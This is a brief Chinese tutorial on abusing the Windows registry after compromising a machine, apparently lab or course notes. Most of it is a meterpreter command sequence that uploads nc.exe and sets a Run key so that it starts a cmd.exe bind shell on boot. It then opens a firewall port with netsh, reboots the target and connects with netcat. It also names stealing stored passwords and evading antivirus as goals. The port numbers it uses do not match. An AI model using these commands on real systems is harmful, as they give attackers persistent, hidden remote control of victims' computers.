注册表修改不当，可直接系统崩溃

修改前备份注册表

某些修改是不可逆的

正版序列号存在注册表里

保存的帐号密码也在注册表里

修改、增加启动项

窃取存储于注册表的机密信息

绕过文件型病毒查杀

meterpreter

用注册表添加NC]后门

添加一个自动启动项

上传文件

    upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

枚举某主键下的键值

    reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

增加一个键值

    reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
-d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'

查询

    reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -
v nc

打开防火墙端口

execute -f cmd -i -H
netsh firewall show opmode
netsh firewall add portopening TCP 4444 "test" ENABLE ALL
shutdown -r -t 0
nc 1.1.1.1 4444